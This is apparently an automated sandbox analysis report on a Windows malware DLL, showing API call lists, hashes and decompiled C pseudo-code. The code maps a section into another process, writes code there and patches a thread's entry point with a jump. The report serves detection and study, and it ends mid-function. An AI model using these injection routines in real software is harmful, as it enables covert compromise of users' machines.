                                                                                                                                                                                                0x1000d113
                                                                                                                                                                                                0x1000d114
                                                                                                                                                                                                0x1000d0fb
                                                                                                                                                                                                0x1000d0fb
                                                                                                                                                                                                0x1000d0fb
                                                                                                                                                                                                0x1000d11a
                                                                                                                                                                                                0x1000d120
                                                                                                                                                                                                0x1000d125
                                                                                                                                                                                                0x1000d12b
                                                                                                                                                                                                0x1000d133
                                                                                                                                                                                                0x1000d139
                                                                                                                                                                                                0x1000d13d
                                                                                                                                                                                                0x1000d143
                                                                                                                                                                                                0x1000d14a
                                                                                                                                                                                                0x1000d151
                                                                                                                                                                                                0x1000d155
                                                                                                                                                                                                0x1000d15c
                                                                                                                                                                                                0x1000d15d
                                                                                                                                                                                                0x1000d16a
                                                                                                                                                                                                0x1000d171
                                                                                                                                                                                                0x1000d17e
                                                                                                                                                                                                0x1000d180
                                                                                                                                                                                                0x1000d180
                                                                                                                                                                                                0x1000d18c
                                                                                                                                                                                                0x1000d198
                                                                                                                                                                                                0x1000d1a8
                                                                                                                                                                                                0x1000d1ae
                                                                                                                                                                                                0x1000d1b4
                                                                                                                                                                                                0x1000d1b6
                                                                                                                                                                                                0x1000d1c7
                                                                                                                                                                                                0x1000d1cd
                                                                                                                                                                                                0x1000d1d3
                                                                                                                                                                                                0x1000d1d8
                                                                                                                                                                                                0x1000d1de
                                                                                                                                                                                                0x1000d1e4
                                                                                                                                                                                                0x1000d1e9
                                                                                                                                                                                                0x1000d1ee
                                                                                                                                                                                                0x1000d1ee
                                                                                                                                                                                                0x1000d1f4
                                                                                                                                                                                                0x1000d1f4
                                                                                                                                                                                                0x1000d1fd
                                                                                                                                                                                                0x1000d209
                                                                                                                                                                                                0x1000d211
                                                                                                                                                                                                0x1000d215
                                                                                                                                                                                                0x1000d215
                                                                                                                                                                                                0x1000d211
                                                                                                                                                                                                0x1000d219
                                                                                                                                                                                                0x1000d21f
                                                                                                                                                                                                0x1000d225
                                                                                                                                                                                                0x1000d22c
                                                                                                                                                                                                0x1000d23d
                                                                                                                                                                                                0x1000d243
                                                                                                                                                                                                0x1000d24b
                                                                                                                                                                                                0x1000d252
                                                                                                                                                                                                0x1000d254
                                                                                                                                                                                                0x1000d265
                                                                                                                                                                                                0x1000d26b
                                                                                                                                                                                                0x1000d270
                                                                                                                                                                                                0x1000d273
                                                                                                                                                                                                0x1000d276
                                                                                                                                                                                                0x1000d27c
                                                                                                                                                                                                0x1000d282
                                                                                                                                                                                                0x1000d284
                                                                                                                                                                                                0x1000d28a
                                                                                                                                                                                                0x1000d293
                                                                                                                                                                                                0x1000d296
                                                                                                                                                                                                0x1000d296
                                                                                                                                                                                                0x1000d299
                                                                                                                                                                                                0x1000d2a1
                                                                                                                                                                                                0x1000d2ac
                                                                                                                                                                                                0x1000d2b2
                                                                                                                                                                                                0x1000d2a3
                                                                                                                                                                                                0x1000d2a5
                                                                                                                                                                                                0x1000d2a5
                                                                                                                                                                                                0x1000d2bb
                                                                                                                                                                                                0x1000d2bb
                                                                                                                                                                                                0x1000d2c1
                                                                                                                                                                                                0x1000d2c9
                                                                                                                                                                                                0x1000d2d4
                                                                                                                                                                                                0x1000d2d9
                                                                                                                                                                                                0x1000d2df
                                                                                                                                                                                                0x1000d2e1
                                                                                                                                                                                                0x1000d2ee
                                                                                                                                                                                                0x1000d2ef
                                                                                                                                                                                                0x1000d2f0
                                                                                                                                                                                                0x1000d2fb
                                                                                                                                                                                                0x1000d2fd
                                                                                                                                                                                                0x1000d304
                                                                                                                                                                                                0x1000d304
                                                                                                                                                                                                0x1000d30e
                                                                                                                                                                                                0x1000d313
                                                                                                                                                                                                0x1000d318
                                                                                                                                                                                                0x1000d318
                                                                                                                                                                                                0x1000d31e
                                                                                                                                                                                                0x1000d325
                                                                                                                                                                                                0x1000d326
                                                                                                                                                                                                0x1000d333
                                                                                                                                                                                                0x1000d346
                                                                                                                                                                                                0x1000d34b
                                                                                                                                                                                                0x1000d350
                                                                                                                                                                                                0x1000d359
                                                                                                                                                                                                0x1000d359
                                                                                                                                                                                                0x1000d35f
                                                                                                                                                                                                0x1000d364
                                                                                                                                                                                                0x1000d36a
                                                                                                                                                                                                0x1000d370
                                                                                                                                                                                                0x1000d375
                                                                                                                                                                                                0x1000d37e
                                                                                                                                                                                                0x1000d380
                                                                                                                                                                                                0x1000d387
                                                                                                                                                                                                0x1000d387
                                                                                                                                                                                                0x1000d38d
                                                                                                                                                                                                0x1000d395
                                                                                                                                                                                                0x1000d39a
                                                                                                                                                                                                0x1000d39b
                                                                                                                                                                                                0x1000d3a0
                                                                                                                                                                                                0x1000d3a9
                                                                                                                                                                                                0x1000d3ab
                                                                                                                                                                                                0x1000d3b6
                                                                                                                                                                                                0x1000d3b6
                                                                                                                                                                                                0x1000d3bf
                                                                                                                                                                                                0x1000d3c7
                                                                                                                                                                                                0x1000d3ce
                                                                                                                                                                                                0x1000d3d3
                                                                                                                                                                                                0x1000d3e2
                                                                                                                                                                                                0x1000d3fa
                                                                                                                                                                                                0x1000d401
                                                                                                                                                                                                0x1000d40f
                                                                                                                                                                                                0x1000d421
                                                                                                                                                                                                0x1000d428
                                                                                                                                                                                                0x1000d430
                                                                                                                                                                                                0x1000d435
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1000D088
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D0C4
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 1000D0E1
                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000114,00000080,?,?,?), ref: 1000D173
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1000D180
                                                                                                                                                                                                • GetSystemMetrics.USER32(00001000), ref: 1000D18C
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D1AE
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1000D1B4
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D209
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 1000D250
                                                                                                                                                                                                  • Part of subcall function 1000BAA4: CloseHandle.KERNELBASE(?,00000000,74E5F500,10000000), ref: 1000BB48
                                                                                                                                                                                                • memset.MSVCRT ref: 1000D26B
                                                                                                                                                                                                • GetVersionExA.KERNEL32(00000000), ref: 1000D276
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000100), ref: 1000D290
                                                                                                                                                                                                • IsWow64Process.KERNEL32(00000000), ref: 1000D293
                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?), ref: 1000D2AC
                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D2C9
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Process$Current$ErrorLast$FileModuleNameSystem$AllocByteCharCloseDirectoryHandleHeapInfoMetricsMultiVersionWideWindowsWow64memset
                                                                                                                                                                                                • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                                • API String ID: 3386120184-2706916422
                                                                                                                                                                                                • Opcode ID: d3c8a52316226b16e523e3f39415754c5eb9add7e1a416d3030c1f9eba03589a
                                                                                                                                                                                                • Instruction ID: 23cb5d85761a2f79723220f042d2e588453e1a85ee774e6f3551f9871d856d11
                                                                                                                                                                                                • Opcode Fuzzy Hash: d3c8a52316226b16e523e3f39415754c5eb9add7e1a416d3030c1f9eba03589a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B14A75600705AFE714EB74CC89FEA77E8EF18380F01486EF55AD7295EB70AA448B21
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000C702, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200nativeregistrymemoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                			E1000C702(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x4cb04a0
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E280(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x4d2f9a0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E1000864A( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E100085FB( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x4cb04a0
					 *0x1001e688 = _t131;
					E100086C2(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C681(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}


























                                                                                                                                                                                                0x1000c708
                                                                                                                                                                                                0x1000c70f
                                                                                                                                                                                                0x1000c711
                                                                                                                                                                                                0x1000c713
                                                                                                                                                                                                0x1000c715
                                                                                                                                                                                                0x1000c718
                                                                                                                                                                                                0x1000c71b
                                                                                                                                                                                                0x1000c71e
                                                                                                                                                                                                0x1000c721
                                                                                                                                                                                                0x1000c724
                                                                                                                                                                                                0x1000c727
                                                                                                                                                                                                0x1000c731
                                                                                                                                                                                                0x1000c734
                                                                                                                                                                                                0x1000c73b
                                                                                                                                                                                                0x1000c740
                                                                                                                                                                                                0x1000c740
                                                                                                                                                                                                0x1000c746
                                                                                                                                                                                                0x1000c748
                                                                                                                                                                                                0x1000c751
                                                                                                                                                                                                0x1000c8f7
                                                                                                                                                                                                0x1000c8fb
                                                                                                                                                                                                0x1000c900
                                                                                                                                                                                                0x1000c906
                                                                                                                                                                                                0x1000c909
                                                                                                                                                                                                0x1000c909
                                                                                                                                                                                                0x1000c90d
                                                                                                                                                                                                0x1000c912
                                                                                                                                                                                                0x1000c924
                                                                                                                                                                                                0x1000c924
                                                                                                                                                                                                0x1000c92d
                                                                                                                                                                                                0x1000c937
                                                                                                                                                                                                0x1000c937
                                                                                                                                                                                                0x1000c93e
                                                                                                                                                                                                0x1000c93e
                                                                                                                                                                                                0x1000c760
                                                                                                                                                                                                0x1000c77a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000c785
                                                                                                                                                                                                0x1000c78f
                                                                                                                                                                                                0x1000c799
                                                                                                                                                                                                0x1000c79c
                                                                                                                                                                                                0x1000c7a2
                                                                                                                                                                                                0x1000c7a9
                                                                                                                                                                                                0x1000c7aa
                                                                                                                                                                                                0x1000c7ab
                                                                                                                                                                                                0x1000c7b4
                                                                                                                                                                                                0x1000c7b5
                                                                                                                                                                                                0x1000c7b6
                                                                                                                                                                                                0x1000c7b8
                                                                                                                                                                                                0x1000c7bb
                                                                                                                                                                                                0x1000c7be
                                                                                                                                                                                                0x1000c7c1
                                                                                                                                                                                                0x1000c7c4
                                                                                                                                                                                                0x1000c7d0
                                                                                                                                                                                                0x1000c7f2
                                                                                                                                                                                                0x1000c7fa
                                                                                                                                                                                                0x1000c7fd
                                                                                                                                                                                                0x1000c808
                                                                                                                                                                                                0x1000c808
                                                                                                                                                                                                0x1000c7fa
                                                                                                                                                                                                0x1000c833
                                                                                                                                                                                                0x1000c8f4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000c839
                                                                                                                                                                                                0x1000c845
                                                                                                                                                                                                0x1000c85a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000c870
                                                                                                                                                                                                0x1000c872
                                                                                                                                                                                                0x1000c879
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000c88a
                                                                                                                                                                                                0x1000c8a1
                                                                                                                                                                                                0x1000c8b1
                                                                                                                                                                                                0x1000c8bd
                                                                                                                                                                                                0x1000c8c2
                                                                                                                                                                                                0x1000c8c8
                                                                                                                                                                                                0x1000c8d8
                                                                                                                                                                                                0x1000c8e4
                                                                                                                                                                                                0x1000c8ec
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000c8ec

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CCD), ref: 1000C775
                                                                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 1000C7C7
                                                                                                                                                                                                • CreateWindowExA.USER32 ref: 1000C7F2
                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 1000C7FD
                                                                                                                                                                                                • UnregisterClassA.USER32 ref: 1000C808
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C824
                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C82E
                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,1000CBE2,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C855
                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(1000CBE2,00000000,00001AC4,00001000,00000004), ref: 1000C898
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(1000CBE2,00000000,00000000,00001AC4,?), ref: 1000C8B1
                                                                                                                                                                                                  • Part of subcall function 100085FB: HeapFree.KERNEL32(00000000,00000000,00000001,000000FF,10006024), ref: 10008641
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 1000C91D
                                                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C924
                                                                                                                                                                                                • NtClose.NTDLL(00000000), ref: 1000C937
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                                                                                                                                                                                                • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                                                                                                                                                                                • API String ID: 2002808388-2319545179
                                                                                                                                                                                                • Opcode ID: 30471a9a4c683b7a67de2c4037cb7c39743ebf929aca841839c7d9ccad541335
                                                                                                                                                                                                • Instruction ID: dc3ac7719f08381f618c8310bb1be9f95b5925889f8563784b0ee3a3e9f177f1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 30471a9a4c683b7a67de2c4037cb7c39743ebf929aca841839c7d9ccad541335
                                                                                                                                                                                                • Instruction Fuzzy Hash: 10713971900259AFEB11CF95CD88EAFBBB9FF49740F214069F605B7290D770AA05CB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10005F63, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104threadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085D0();
				_t19 = E100097ED( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F59();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095A8(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085A3( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A93( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1FE(0x1001ba20, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095C2(0x1001ba20);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085B6();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005DE7, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085B6();
					}
					goto L10;
				}
			}




















                                                                                                                                                                                                0x10005f63
                                                                                                                                                                                                0x10005f73
                                                                                                                                                                                                0x10005f7d
                                                                                                                                                                                                0x100060b1
                                                                                                                                                                                                0x100060a4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100060a6
                                                                                                                                                                                                0x100060b8
                                                                                                                                                                                                0x10006079
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10006079
                                                                                                                                                                                                0x10005f83
                                                                                                                                                                                                0x10005f8b
                                                                                                                                                                                                0x10005f92
                                                                                                                                                                                                0x10005f94
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10005fa7
                                                                                                                                                                                                0x10005fa7
                                                                                                                                                                                                0x10005fad
                                                                                                                                                                                                0x10005fb3
                                                                                                                                                                                                0x10005fc3
                                                                                                                                                                                                0x10005fc8
                                                                                                                                                                                                0x10005fd0
                                                                                                                                                                                                0x10005fd8
                                                                                                                                                                                                0x10005ff4
                                                                                                                                                                                                0x10005ff9
                                                                                                                                                                                                0x10005ffc
                                                                                                                                                                                                0x10005ffe
                                                                                                                                                                                                0x10006000
                                                                                                                                                                                                0x1000600d
                                                                                                                                                                                                0x10006016
                                                                                                                                                                                                0x1000601f
                                                                                                                                                                                                0x10006024
                                                                                                                                                                                                0x10006025
                                                                                                                                                                                                0x10006033
                                                                                                                                                                                                0x1000603d
                                                                                                                                                                                                0x1000604e
                                                                                                                                                                                                0x10006053
                                                                                                                                                                                                0x1000605a
                                                                                                                                                                                                0x10006061
                                                                                                                                                                                                0x10006064
                                                                                                                                                                                                0x10006070
                                                                                                                                                                                                0x10006071
                                                                                                                                                                                                0x1000607d
                                                                                                                                                                                                0x10006086
                                                                                                                                                                                                0x10006098
                                                                                                                                                                                                0x1000609b
                                                                                                                                                                                                0x100060a2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100060a2
                                                                                                                                                                                                0x10006073
                                                                                                                                                                                                0x10006078
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10005fd8

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • OutputDebugStringA.KERNELBASE(Hello qqq), ref: 10005F73
                                                                                                                                                                                                • SetLastError.KERNEL32(000000AA), ref: 100060B8
                                                                                                                                                                                                  • Part of subcall function 100085D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F88), ref: 100085D9
                                                                                                                                                                                                  • Part of subcall function 100097ED: GetSystemTimeAsFileTime.KERNEL32(?,?,10005F90), ref: 100097FA
                                                                                                                                                                                                  • Part of subcall function 100097ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000981A
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 10005FAD
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FC8
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 10005FD0
                                                                                                                                                                                                • memset.MSVCRT ref: 10005FF4
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006016
                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 10006064
                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,10005DE7,00000000,00000000,?), ref: 10006098
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                                                                                                                                                                                • String ID: Hello qqq
                                                                                                                                                                                                • API String ID: 3435743081-3610097158
                                                                                                                                                                                                • Opcode ID: 06ff6eb8eaa457d7cf6ef365445eacd114f838b847e03b57660ef2c27bb21647
                                                                                                                                                                                                • Instruction ID: 302d5c5ac892887bccd1c7cb77e125985df951ac9c87ae0613dda5153ae7e50a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 06ff6eb8eaa457d7cf6ef365445eacd114f838b847e03b57660ef2c27bb21647
                                                                                                                                                                                                • Instruction Fuzzy Hash: FE31C374900254ABFB50DB60CC89EAF37B9EF483D1F208129F959D6199DB34EB44CB22
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1006BF06, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00000668,00003000,00000040,00000668,1006B958), ref: 1006BFC3
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000179,00003000,00000040,1006B9B8), ref: 1006BFFA
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00023713,00003000,00000040), ref: 1006C05A
                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1006C090
                                                                                                                                                                                                • VirtualProtect.KERNEL32(10000000,00000000,00000004,1006BEE5), ref: 1006C195
                                                                                                                                                                                                • VirtualProtect.KERNEL32(10000000,00001000,00000004,1006BEE5), ref: 1006C1BC
                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,1006BEE5), ref: 1006C289
                                                                                                                                                                                                • VirtualProtect.KERNEL32(00000000,?,00000002,1006BEE5,?), ref: 1006C2DF
                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 1006C2FB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.389072703.000000001006B000.00000040.00020000.sdmp, Offset: 1006B000, based on PE: false
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2574235972-0
                                                                                                                                                                                                • Opcode ID: 829fb23694ff34e194c5e2cf2250b18a96e34f8bd3d334ff578e1805b3364683
                                                                                                                                                                                                • Instruction ID: 14006f8252920c6ae118e49af7f968b6d8dac2f8d3e8c870e18e0d4c9ed26aa4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 829fb23694ff34e194c5e2cf2250b18a96e34f8bd3d334ff578e1805b3364683
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FD128725032419FDB91CF24C980E6177A6FB4A310B2946D4AD0E9F26ADE3DB850CB72
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1000CBB9, Relevance: 9.1, APIs: 6, Instructions: 105nativethreadCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000CBB9(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t32;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t39;
				void* _t63;
				long _t65;
				void* _t70;
				void** _t73;
				void* _t74;

				_t73 = __edx;
				_t63 = __ecx;
				_t74 = 0;
				if(E1000C510(__ecx, __edx, __edx, 0) != 0) {
					_t39 = E1000C702( *((intOrPtr*)(__edx)), _a4); // executed
					_t74 = _t39;
					if(_t74 != 0) {
						memset( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t73[1],  &_v744) != 0) {
							_t70 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t65 = 5;
							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
							_v8 = _t65;
							_v16 = _t70;
							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v744.Eax,  &_v24, _t65,  &_v8) < 0) {
								L6:
								_t74 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				_t32 =  *0x1001e77c; // 0x0
				if(_t32 != 0) {
					FreeLibrary(_t32);
					 *0x1001e77c =  *0x1001e77c & 0x00000000;
				}
				_t33 =  *0x1001e784; // 0x0
				if(_t33 != 0) {
